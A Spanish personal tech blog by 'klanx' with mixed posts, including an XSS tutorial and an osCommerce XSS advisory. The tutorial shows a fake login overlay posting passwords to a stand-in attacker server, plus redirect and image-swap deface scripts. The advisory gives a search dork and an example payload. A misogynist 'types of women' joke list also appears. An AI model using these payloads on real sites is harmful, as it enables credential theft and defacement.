-
Flickr Photos
More Photos
Twiteando .-. !
Twitter. Valla, al fin pude ver y asociarme al famoso twitter, que por mas, es algo vicioso… este es el segundo dia de mi estancia en twitter, Algo desertico pero en fin, creo que es divertido =).
Si aun no twiteas, pues calalo, quizas te guste =)
Les dejo mi twitter:
http://twitter.com/klanxS.W. (star wars) Vs. Titanic, – Que historia tan romatica ñ.ñ
Imaginense como serian los ataques de star wars, hacia el titanic. Pues vean lo que pasaria xD
Fuente:http://chistesgeeks.com/
19 Tipos de mujeres
1. Mujer Virus: Cuando menos lo esperas, se instala en tu apartamento y va apoderándose de todos tus espacios. Si intentas desinstalarla, vas a perder muchas cosas; si no lo intentas, perdes todas.
2. Mujer Internet: Hay que pagar para tener acceso a ella.
3. Mujer Servidor: Siempre está ocupada cuando la necesitas.
4. Mujer Windows: Sabes que tiene muchos fallos, pero no puedes vivir sin ella.
5. Mujer Macintosh: Preciosa, infalible y algo cara, no muy compatible con otras… y solo el 5% de los hombres saben la dicha de tenerla.
6. Mujer Powerpoint: Ideal para presentarla a la gente en fiestas, convenciones, etcétera.
7. Mujer Excel: Dicen que hace muchas cosas, pero tú tan solo la utilizas para la operación básica.
8. Mujer Word: Tiene siempre una sorpresa reservada para ti y no existe nadie en el mundo que le comprenda totalmente.
9. Mujer D.O.S.: Todos la tuvieron algún día, pero nadie la quiere ahora.
10. Mujer Backup: Tu crees que tiene lo suficiente, pero a la hora de “vamos a ver”, le falta algo.
11. Mujer Scandisk: Sabemos que es buena y que sólo quiere ayudar, pero en el fondo nadie sabe lo que realmente está haciendo.
12. Mujer Screensaver: No sirve para nada, pero te divierte.
13.
14. Mujer RAM: Aquella que olvida todo apenas se desconecta.
15. Mujer Disco Duro: Se acuerda de todo, todo el tiempo.
16. Mujer Mouse: Funciona sólo cuando la arrastras.
17. Mujer Multimedia: Hace que todo parezca bonito.
18. Mujer Usuario: No hace nada bien y siempre esta haciendo preguntas.
19. Mujer e-Mail: de cada diez cosas que dice nueve son tonterías.
XSS introduccion.
Bien, empiezo a meterme por XSS, quizas un poco noob, o quizas mucho. pero a medida que vaya adquiriendo mas practica ire escribiendo resulrados.
dejo esta introduccion de XSS.
XSS – Vulnerability of web -
Elaborado por: klanx < ===========( introduccion a XSS )===============>
: : ========================= [ Para Hackerss.com ] ============= / / /
Elaborado por: klanx < ===========( introduccion a XSS )===============>
: : ========================= [ Para Hackerss.com ] ============= / / /
Ataques XSS – 1/3
// * 1.0 .- XSS.
// * 1.1 .- Metodos de inyeccion.
// * 1.2 .- Descipcion de metodos.
// * 1.3 .- Conclusion.
// * 1.4 .- Despedida.
############################################################
#####
===========================================================
1.0 – XSS
Iniciamos explicando que es XSS, (“Cross Site Scripting”), En cualquier texto te explicaran
brevemente su historia, para ello solo citare algunas cosas importantes:
*/ => Es denominado como la inyeccion al codigo HTML
*/ => ¿Qué es XSS?
XSS es una vulnerabilidad muy utilizada para atacar Webs y se da cuando se usa la web para introducir código malicioso. Los datos por lo general son introducidos por medio de un
formulario o en un hiperenlace. El usuario que sufrirá el ataque pulsará sobre el enlace para ir a otro sitio web, y en dicho sitio el navegador del usuario interpretará este código
malicioso. Una forma de “esconder” este código malicioso es convirtiéndolo a hexadecimal.
*/ => ¿A quién afecta estas vulnerabilidades?
Las vulnerabilidades XSS no afectan, en principio, al servidor que las contiene, sino a los usuarios de ese servidor, que pueden ver como información privada (sesión) puede caer en
malas manos.
Bien tocando estos temas puedes darte una idea de lo que es este metodo.
1.1 – Metodos de inyeccion:
Metodos de inyeccion:
*/ => Inyección a formulario
*/ => Inyección por medio de elementos
*/ => Inyección por medio de recursos
*/ => Ataque de tipo phishing
*/ => Ataque de tipo deface
1.2 – Descipcion de metodos:
Descipcion:
* Inyección a formulario:
= = Se realiza por medio de algún campo de formulario vulnerable a XSS. Aquí lo que se hace es inyectar código que después de enviar la información al servidor, será incluido en el
código fuente de alguna página, ya sea persistente o no persistente.
* Inyección por medio de elementos:
= = No siempre que el navegador envíe datos al servidor lo va a realizar por medio de un formulario. Hay que tener en cuenta también los elementos de la página. Un elemento es
cualquier valor establecido por el usuario o por la aplicación que viaja entre el navegador y el servidor.
El siguiente ejemplo muestra cómo sería una Web vulnerable a este tipo de ataque:
CODE
http://www.MotoroloXD.com/index.php?usuario=<script>alert(“Owned by kl4Nx”);</script>
Así, si en la hipotética página de ‘login’ de esta Web se lanza un diálogo de advertencia con el citado texto significaría que la Web es vulnerable a XSS. Esto podría hacerse a partir
del formulario en la citada página, pero el enviar los datos desde el formulario estos podrían ser codificados de manera que se suprimieran los caracteres especiales utilizados como
los ‘<’, ‘>’ con lo que la inyección no funcionaría.
* Inyección por medio de recursos:
= = Además de la URL y los formularios los datos también se transfieren en las cabeceras HTTP, el navegador y el servidor se comunican a través de estas cabeceras. Por medio de
las cookies se almacenan muchos datos de interés como el identificador de sesión.
Por ejemplo, al dejar un comentario en una Web se guarda una cookie en el navegador del usuario con datos referentes a dicho usuario. La vez siguiente que se acceda a la Web o que
se deje un nuevo comentario se solicitará la cookie al navegador, de manera que la Web reconozca el nombre de usuario o datos similares.
Si dicha cookie no es filtrada adecuadamente podría manipularse incluyendo código malicioso en alguno de sus parámetros. De esta manera podría por ejemplo incluirse un código
de script como nombre de usuario que se ejecutase cada vez que dicho usuario apareciera mencionado en la Web como propietario de sus mensajes.
Otro método posible sería haciendo uso del campo “referer”.
Adicionalmente existe un tipo de inyecciones bastante populares consistente en la inserción de un código malicioso en aplicaciones flash y en videos que posteriormente se insertan
en páginas como MySpace o Hi5. De esta manera cuando otros usuarios visualicen dichos contenidos estarán sufriendo un robo de cookies las cuales podrán ser utilizadas para
suplantar a estos usuarios.
* Ataque de tipo phishing:
= = Aunque el Phishing estrictamente hablando no tiene nada que ver con los ataques XSS se hará una breve reseña de él como resultado de su uso combinado.
Lo que se hace en este caso es crear un clon de una página y hacer creer al usuario cuando está navegando, que lo está haciendo en la original, cuando en realidad lo está haciendo en
una falsa creada por un hacker, como resultado de haber hecho un ataque XSS a la Web original.
Un phiser espera que un usuario visite su Web, cuya URL normalmente se asemeja a la de la real pero introduce variaciones o errores comunes que se producen al teclear, para
engañar al usuario.
Sin embargo en un ataque de este tipo el usuario puede verse afectado incluso habiendo introducido él mismo la dirección Web original en su navegador. El ataque es de la siguiente
forma:
El hacker encuentra un bug de XSS e inyecta código que redirecciona el navegador a otra página exactamente igual a la original y posteriormente le pide sus datos. En el momento en
el que los introduzca el juackerito ya se puede hacer pasar por él.
Otro método utilizado para esto es crear una capa de un tamaño grande, de modo que cubra todo el contenido de la página original, se pide usuario y contraseña y se envía
directamente al servidor del juackerito.
CODE
<div id=layer1 style=”position:absolute; top:0; left:0; width:1000; height:900; zindex:
1; background-color:#000000;”><center><h1>LOGIN PAGE</h1><BR><form
action=”http://servidor-atacante.com/login.php” method=”post>Contraseña:<input
type=”password”><input type=”submit”></form><center></div>
1; background-color:#000000;”><center><h1>LOGIN PAGE</h1><BR><form
action=”http://servidor-atacante.com/login.php” method=”post>Contraseña:<input
type=”password”><input type=”submit”></form><center></div>
Otra forma de hacer esto es a través de un frame gigante.
El problema de esto está en que para hacer un clon de una página no hace falta mucho esfuerzo, ya que como hay acceso al código fuente simplemente hay que ocuparse de incrustar
las imágenes y posteriormente preparar el servidor del atacante (juackerito) para guardar todos los datos.
* Ataque de tipo deface:
= = XSS no se puede utilizar para dañar un servidor, pero eso no significa que no se pueda hacer un deface.
El ataque sería de la siguiente forma:
Primero se identifica un área donde poder realizar la inyección y luego se inyecta el código que mueva el navegador a otra página o inyectar un bloque que oculte toda la página:
CODE
<select>
<option>Home</option>
<option>Gallery</option>
<option>Links</option>
<option>Contact</option>
<option> wawa</option></select>
<script>window.location=’http://web.com/Owned.htm’</script>
</select>
<option>Home</option>
<option>Gallery</option>
<option>Links</option>
<option>Contact</option>
<option> wawa</option></select>
<script>window.location=’http://web.com/Owned.htm’</script>
</select>
Un ejemplo de cambio en la página es la modificación de las imágenes, introduciendo aquellas que el atacante quiera. Con este script lo que se hace es que la segunda imagen que se
muestra en la página sea la imagen que quiere el atacante (imagenMala.gif).
CODE
<script>
document.images[2].src=”http://www.soylaleche.com/techingas.gif”
</script>
document.images[2].src=”http://www.soylaleche.com/techingas.gif”
</script>
Para concluir este apartado hay que decir que en la mayoría de los casos las inyecciones de código no se ven como tal, sino que lo que hacen los atacantes es transformarlas, de
manera que su detección sea más difícil, como se verá a continuación.
============================================================
======== : :
1.3 – Conclusion:
bien, esto es algo teorico y algo ejemplar de lo que es el ataque XSS en varias formas. Asi como estas existen no solo 5, 6 o 7, existen muchas formas de aplicar este metodo.
Menciono algunos otros:
*- Atacando los headers
*- STR_Replace (Cuando no contamos con un script)
*- Entre otras mas.
Mientras cuentes con la imaginacion podras elaborar lo que gustes. No hay fronteras en un ataque.
1.4 – Despedida:
Bien aqui termino una introduccion al tema de XSS
==> Espero les alla gustado, y mas que nada servido esta informacion.
Este texto esta modificado, contando con bibliografia de las siguientes fuentes:
Fuente 1
Fuente 2
Saludos:
* Mgp25
* Nullcool
* Bucio
* Th3r0rn
* Farid
* Ironic
* y a todos los que faltan 
klanx
Riete a carcajadas.
Navegando hace tiempo me tope en la red un blog muy simpatico =)
De que trata?, Chistes GEEKS! =)
les pongo el link, la verdad me parecio muy bueno =)
Chistes Geeks
Pack 1 para diseñadores 3D
Texturas 3D – Pack 1
by klanx.
En este pack solo pongo Bloques y texturas del Software Lightwave.
-* Bloques
-* Texturas
* Exterior surfaces
* Purpose Surfaces
* Interior Surfaces
* Classic Stonework
* Entre otras…
Archivo Zip.
Descarga rapidshare.
Descarga megaupload.
Archivo Rar.->Pass (klanx)<-
Descarga rapidshare.
Descarga megaupload.
Vulnerabilidad en Os-commerce XSS “loadadminpage=”
########################################
# #
# XSS Cross-site scripting #
# by klanx #
# - ================- #
########################################
[~] Vulnerability found by: klanx
[~] Greetz: hss.com
[~] Xrated team.
==========-
[~] Dork: "allinurl:frontpage_right.php?loadadminpage".
==========-
[~] Metod: XSS
==========-
[~]
Example:
http://www.example.com/ara_bul.asp?ara=ope...?loadadminpage= --> XSS script <--
http://www.example.com/ara_bul.asp?ara=ope...?loadadminpage=<script>alert("/")</script>
[~] klanx-Xrated Team.
==========-
Klan da la bienvenida
Bueno gente, empiezo este proyecto, haber si este si lo lleno de cosillas que me encuentre, espero les guste. y pues deseenme suerte U_U
aqui encontraras, las noticias mas sobresalientes del mundo informatico, como actualizaciones de software libre, nuevas distros en Gnu/Linux, asi como cualquier otra alternativa para tus trabajos, encontraras novedades en diseño, y una amplia galeria para que puedas trabajar con tu creatividad.
En general tratare de mantener estos temas:
-* Vida geek
-* Hacking
-* Cracking
-* Sistemas operativos
-* Gnu/linux
-* Windows
-* Machintosh
-* Actualizaciones
-* Lanzamientos
-* Reuniones
-* Diseño grafico 2D, 3D.
-* Tutoriales
-* Entretenimiento
-* Entre otras cosas.
Espero les guste la estancia. Saludos
/klan.
